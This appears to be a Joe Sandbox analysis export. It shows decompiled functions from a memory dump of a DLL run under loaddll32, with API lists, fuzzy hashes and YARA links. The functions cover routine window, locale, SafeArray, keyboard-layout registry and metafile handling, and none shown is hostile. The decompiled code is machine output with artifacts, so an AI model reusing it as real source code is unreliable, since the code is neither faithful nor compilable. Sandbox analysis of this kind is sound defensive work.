0x00000000
0x0074af2f
0x0074ae2f
0x0074ae33
0x0074ae3c
0x0074ae40
0x0074ae42
0x0074ae42
0x0074ae40
0x0074ae4d
0x0074ae53
0x0074ae59
0x0074ae66
0x0074ae6c
0x0074ae9a
0x0074aeac
0x0074aeb2
0x0074aeb4
0x0074aeb4
0x0074aec0
0x0074aecc
0x0074aede
0x0074aeee
0x0074aef9
0x0074aefe
0x0074aefe
0x0074aeac
0x0074af04
0x0074af05
0x0074ae59

APIs

RectVisible.GDI32(?,?), ref: 0074AEA5
SaveDC.GDI32(?), ref: 0074AEBB
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0074AEDE
RestoreDC.GDI32(?,?), ref: 0074AEF9
CreateSolidBrush.GDI32(00000000), ref: 0074AF7A
FrameRect.USER32 ref: 0074AFAD
DeleteObject.GDI32(?), ref: 0074AFB7
CreateSolidBrush.GDI32(00000000), ref: 0074AFC7
FrameRect.USER32 ref: 0074AFFA
DeleteObject.GDI32(?), ref: 0074B004

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
Instruction ID: a7a1f0fe97528f3fc158a89f806de0cceeace0803cde9f0657c434953f625968
Opcode Fuzzy Hash: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
Instruction Fuzzy Hash: C1514A71204344EBDB18EF68C8C9B6B77E8AF85304F044458FE998B296E739EC55CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0074D24C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0074D24C(void* __eax) {
				void* _v32;
				struct _WINDOWPLACEMENT _v60;
				struct tagPOINT _v68;
				intOrPtr _v72;
				struct HWND__* _t21;
				void* _t42;
				struct HWND__* _t44;
				struct tagPOINT* _t46;

				_t46 =  &_v60;
				_t42 = __eax;
				_t21 =  *(__eax + 0x180);
				_push(_t21);
				L00706A50();
				if(_t21 == 0) {
					GetWindowRect( *(__eax + 0x180), _t46);
				} else {
					_v60.length = 0x2c;
					GetWindowPlacement( *(__eax + 0x180),  &_v60);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t42 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t44 = GetWindowLongA( *(_t42 + 0x180), 0xfffffff8);
					if(_t44 != 0) {
						ScreenToClient(_t44, _t46);
						ScreenToClient(_t44,  &_v68);
					}
				}
				 *(_t42 + 0x40) = _t46->x;
				 *((intOrPtr*)(_t42 + 0x44)) = _v72;
				 *((intOrPtr*)(_t42 + 0x48)) = _v68.x - _t46->x;
				 *((intOrPtr*)(_t42 + 0x4c)) = _v68.y - _v72;
				return L00745F80(_t42);
			}

0x0074d24f
0x0074d252
0x0074d254
0x0074d25a
0x0074d25b
0x0074d262
0x0074d291
0x0074d264
0x0074d264
0x0074d278
0x0074d283
0x0074d284
0x0074d285
0x0074d286
0x0074d286
0x0074d2a9
0x0074d2b9
0x0074d2bd
0x0074d2c1
0x0074d2cc
0x0074d2cc
0x0074d2bd
0x0074d2d4
0x0074d2db
0x0074d2e5
0x0074d2f0
0x0074d300

APIs

MBToWCSEx.USER32 ref: 0074D25B
GetWindowPlacement.USER32(?,0000002C), ref: 0074D278
GetWindowRect.USER32 ref: 0074D291
GetWindowLongA.USER32 ref: 0074D29F
GetWindowLongA.USER32 ref: 0074D2B4
ScreenToClient.USER32 ref: 0074D2C1
ScreenToClient.USER32 ref: 0074D2CC

Strings

,, xrefs: 0074D264

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Window$ClientLongScreen$PlacementRect
String ID: ,
API String ID: 956096949-3772416878
Opcode ID: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
Instruction ID: 1430288545a0765b8d52e3ce6c4598ac1792b96542a423cce81f020a8292e228
Opcode Fuzzy Hash: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
Instruction Fuzzy Hash: 97118271504200EFCB51EFACC899A9B77E8BF49310F144668FD58DB286D779ED048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0070CA64 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0070CA64(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x70cd2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0070C8F0();
				E0070B1F8(__ebx, __edi, __esi);
				_t196 =  *0x76f750;
				if( *0x76f750 != 0) {
					E0070B3D0(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0070B148(_t43, 0, 0x14,  &_v20);
				E007040BC(0x76f684, _v20);
				E0070B148(_t43, 0x70cd44, 0x1b,  &_v24);
				 *0x76f688 = E007083E8(0x70cd44, 0, _t196);
				E0070B148(_t132, 0x70cd44, 0x1c,  &_v28);
				 *0x76f689 = E007083E8(0x70cd44, 0, _t196);
				 *0x76f68a = E0070B194(_t132, 0x2c, 0xf);
				 *0x76f68b = E0070B194(_t132, 0x2e, 0xe);
				E0070B148(_t132, 0x70cd44, 0x19,  &_v32);
				 *0x76f68c = E007083E8(0x70cd44, 0, _t196);
				 *0x76f68d = E0070B194(_t132, 0x2f, 0x1d);
				E0070B148(_t132, "m/d/yy", 0x1f,  &_v40);
				E0070B480(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E007040BC(0x76f690, _v36);
				E0070B148(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0070B480(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E007040BC(0x76f694, _v44);
				 *0x76f698 = E0070B194(_t132, 0x3a, 0x1e);
				E0070B148(_t132, 0x70cd78, 0x28,  &_v52);
				E007040BC(0x76f69c, _v52);
				E0070B148(_t132, 0x70cd84, 0x29,  &_v56);
				E007040BC(0x76f6a0, _v56);
				E00704068( &_v12);
				E00704068( &_v16);
				E0070B148(_t132, 0x70cd44, 0x25,  &_v60);
				_t104 = E007083E8(0x70cd44, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00704100( &_v8, 0x70cd9c);
				} else {
					E00704100( &_v8, 0x70cd90);
				}
				E0070B148(_t132, 0x70cd44, 0x23,  &_v64);
				_t111 = E007083E8(0x70cd44, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0070B148(_t132, 0x70cd44, 0x1005,  &_v68);
					if(E007083E8(0x70cd44, 0, _t198) != 0) {
						E00704100( &_v12, 0x70cdb8);
					} else {
						E00704100( &_v16, 0x70cda8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E007043E8();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E007043E8();
				 *0x76f752 = E0070B194(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0070CD36);
				return E0070408C( &_v68, 0x10);
			}

0x0070ca64
0x0070ca64
0x0070ca65
0x0070ca67
0x0070ca6c
0x0070ca6c
0x0070ca6e
0x0070ca70
0x0070ca70
0x0070ca73
0x0070ca76
0x0070ca77
0x0070ca7c
0x0070ca7f
0x0070ca82
0x0070ca87
0x0070ca8c
0x0070ca93
0x0070ca95
0x0070ca95
0x0070ca9f
0x0070caae
0x0070cabb
0x0070cad0
0x0070cadf
0x0070caf4
0x0070cb03
0x0070cb16
0x0070cb29
0x0070cb3e
0x0070cb4d
0x0070cb60
0x0070cb75
0x0070cb80
0x0070cb8d
0x0070cba2
0x0070cbad
0x0070cbba
0x0070cbcd
0x0070cbe2
0x0070cbef
0x0070cc04
0x0070cc11
0x0070cc19
0x0070cc21
0x0070cc36
0x0070cc40
0x0070cc45
0x0070cc47
0x0070cc60
0x0070cc49
0x0070cc51
0x0070cc51
0x0070cc75
0x0070cc7f
0x0070cc84
0x0070cc86
0x0070cc98
0x0070cca9
0x0070ccc2
0x0070ccab
0x0070ccb3
0x0070ccb3
0x0070cca9
0x0070ccc7
0x0070ccca
0x0070cccd
0x0070ccd2
0x0070ccdf
0x0070cce4
0x0070cce7
0x0070ccea
0x0070ccef
0x0070ccfc
0x0070cd0f
0x0070cd16
0x0070cd19
0x0070cd1c
0x0070cd2e

APIs

GetThreadLocale.KERNEL32(00000000,0070CD2F,?,?,00000000,00000000), ref: 0070CA9A

Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166

Strings

mmmm d, yyyy, xrefs: 0070CB96
:mm, xrefs: 0070CCCD
AMPM, xrefs: 0070CCAE
AMPM , xrefs: 0070CCBD
m/d/yy, xrefs: 0070CB69
:mm:ss, xrefs: 0070CCEA

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 92017bc436aa13b17552b40e400aa7c99a34a591242bc47fb6271d0e0ccf04db
Instruction ID: 2454323ff398105528428c9f1f559afe930e69e2c899eff1e351f4773adb6e95
Opcode Fuzzy Hash: 92017bc436aa13b17552b40e400aa7c99a34a591242bc47fb6271d0e0ccf04db
Instruction Fuzzy Hash: 76618C70B00249DBDB01EBA4EC95A9E77E6DB88300F509779F201AB3D6DA7CDE058721

Uniqueness

Uniqueness Score: -1.00%

Function 0070F04C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0070F04C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0070EBF4(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0070D9A8();
					return E0070EBF4(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0070DDFC();
						_t113 = _t54;
						if(_t113 == 0) {
							E0070E94C(_t100);
						}
						E0070EFA4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0070EFC0(_v788 - 1, _t115) != 0) {
								L0070DE14();
								E0070EBF4(_v792);
								L0070DE14();
								E0070EBF4( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0070EFF0(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0070DE04();
							E0070EBF4(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0070DE0C();
							E0070EBF4(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x0070f04c
0x0070f058
0x0070f05e
0x0070f060
0x0070f06a
0x0070f071
0x0070f071
0x0070f076
0x0070f084
0x0070f1fd
0x0070f204
0x0070f205
0x00000000
0x0070f08a
0x0070f08d
0x0070f09f
0x0070f08f
0x0070f094
0x0070f094
0x0070f0ae
0x0070f0ba
0x0070f0bd
0x0070f12a
0x0070f130
0x0070f131
0x0070f137
0x0070f138
0x0070f13a
0x0070f13f
0x0070f143
0x0070f145
0x0070f145
0x0070f150
0x0070f15b
0x0070f166
0x0070f16f
0x0070f172
0x0070f18e
0x0070f195
0x0070f1a0
0x0070f1b7
0x0070f1bc
0x0070f1d0
0x0070f1d5
0x0070f1e8
0x0070f1e8
0x0070f1f1
0x0070f174
0x0070f174
0x0070f175
0x0070f17b
0x0070f181
0x0070f183
0x0070f185
0x0070f188
0x0070f18b
0x0070f18b
0x0070f18e
0x00000000
0x00000000
0x00000000
0x0070f18e
0x0070f0bf
0x0070f0bf
0x0070f0c0
0x0070f0c2
0x0070f0c8
0x0070f0ca
0x0070f0d9
0x0070f0da
0x0070f0e4
0x0070f0e5
0x0070f0ea
0x0070f0f5
0x0070f0f6
0x0070f100
0x0070f101
0x0070f106
0x0070f121
0x0070f123
0x0070f124
0x0070f127
0x0070f127
0x00000000
0x0070f0c8
0x0070f0bd

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0070F0E5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0070F101
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0070F13A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0070F1B7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0070F1D0
VariantCopy.OLEAUT32(?), ref: 0070F205

Strings

, xrefs: 0070F066

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
Instruction ID: eed5266d82600531429d8077fb1af638d2d1b2f40fba9432a0bd9d300ac262fa
Opcode Fuzzy Hash: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
Instruction Fuzzy Hash: C351FBB590062DDBCB22DB58CC85AD9B3FCAF4C300F0446E5E509E7242DA38AF858F61

Uniqueness

Uniqueness Score: -1.00%

Function 0073666C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0073666C(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x736817);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x73681e);
					return E00704068( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00703244(1);
					E00704068(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00718DF8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(L00751A38( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00708FD0( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x7367d3);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E007042D8( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E007042D8(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x7367da);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x0073666c
0x0073666d
0x0073666f
0x00736678
0x0073667e
0x00736683
0x00736684
0x00736689
0x0073668c
0x00736696
0x007367f8
0x00736800
0x00736803
0x00736806
0x00736816
0x0073669c
0x007366ab
0x007366b4
0x007366c7
0x007366ca
0x007367e7
0x007367ed
0x007367f3
0x00000000
0x007366d0
0x007366d1
0x007366da
0x007366dd
0x007366e9
0x00000000
0x007366ef
0x00736701
0x00736707
0x00736731
0x00000000
0x00736737
0x00736739
0x0073673a
0x0073673f
0x00736742
0x00736745
0x0073676b
0x0073677e
0x00736796
0x007367a4
0x007367b7
0x007367b7
0x007367a4
0x007367be
0x007367c1
0x007367c4
0x007367d2
0x007367d2
0x00736731
0x00000000
0x007367da
0x007367da
0x007367de
0x007367de
0x007367de
0x00000000
0x007366dd
0x007366ca
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00736817,?,023F1458,?,00736879,00000000,?,00748E1B), ref: 007366C2
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0073672A
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,007367D3,?,80000002,00000000), ref: 00736764
RegCloseKey.ADVAPI32(?,007367DA,00000000,?,00000100,00000000,007367D3,?,80000002,00000000), ref: 007367CD

Strings

|Qq, xrefs: 0073669E
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00736714
layout text, xrefs: 0073675B

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$|Qq
API String ID: 1703357764-4010309709
Opcode ID: b4591c82d9f99cac28d113d109f99980b564f7470c45cb47b12d21d290154925
Instruction ID: f7f12eae70ea5f78122ab16b7b3f98b9f34e8cdb2f5248eef43da179f597d7a0
Opcode Fuzzy Hash: b4591c82d9f99cac28d113d109f99980b564f7470c45cb47b12d21d290154925
Instruction Fuzzy Hash: 5A414B75A00219EFEB10DF54C985BDEB7F9FF48304F9080A5E904A7692D778AE44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00723414 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00723414(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E007232B0(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || L00721EBC( &_v38) != _v18) {
					E0072106C();
				}
				_v12 = _v12 - 0x16;
				_v16 = E007026CC(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x723583, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E0072106C();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E0072106C();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x72358a);
				return E007026EC(_v16);
			}

0x00723415
0x00723417
0x00723420
0x00723423
0x00723426
0x0072342a
0x0072343c
0x00723446
0x00723456
0x00723456
0x0072345b
0x00723467
0x0072346a
0x00723478
0x00723486
0x00723490
0x00723499
0x0072349b
0x0072349b
0x007234bb
0x007234d8
0x007234db
0x007234e4
0x007234e9
0x007234ee
0x00723504
0x00723506
0x0072350b
0x0072350d
0x0072350d
0x0072351f
0x00723524
0x0072352e
0x00723534
0x00723539
0x00723540
0x00723558
0x0072355a
0x0072355f
0x00723561
0x00723561
0x00723566
0x0072356c
0x0072356f
0x00723572
0x00723582

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 007234B6
MulDiv.KERNEL32(?,000009EC,00000000), ref: 007234D3
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 007234FF
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0072351F
DeleteEnhMetaFile.GDI32(00000016), ref: 00723540
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00723553

Strings

`, xrefs: 0072349B

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: c5ed2c64b6da05d276807a2143ad2929e9a478bf27f7acbbb7a2ee791c20c7b8
Instruction ID: 753f274d0c216262ce9f4875ed2a96d85b35b2a9ea4f685173b283f1d6ee6f66
Opcode Fuzzy Hash: c5ed2c64b6da05d276807a2143ad2929e9a478bf27f7acbbb7a2ee791c20c7b8
Instruction Fuzzy Hash: BA413DB5E00218EFDB00DFA8D889AAEB7F9EF48710F108159F904E7241E7399E40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0071CAB8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0071CAB8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x76e314; // 0x76f034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x76e130; // 0x713cc8
					L0070B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					L00703A00();
				}
				if(_t53 <= 0) {
					E0071CA90();
				} else {
					E0071CA9C(_t53);
				}
				_v16 = 0;
				_push(0x76f870);
				L00706368();
				_push(_t72);
				_push(0x71cc46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x76c404, _v16);
				_push(_t72);
				_push(0x71cc27);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0071CC2E);
					return E00703274(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0071707C(_v16, 0);
						E00716F6C(_v16, 0);
						L007064A8();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x71cbf1, _t72, 0x76f870);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x71cbc2;
						 *[fs:eax] = _t67;
						_push(E0071CBF8);
						_push(0x76f870);
						L00706368();
						return 0;
					} else {
						goto L15;
					}
				}
			}

0x0071cab9
0x0071cabb
0x0071cabf
0x0071cac0
0x0071cac1
0x0071cac3
0x0071cac8
0x0071cad0
0x0071cad7
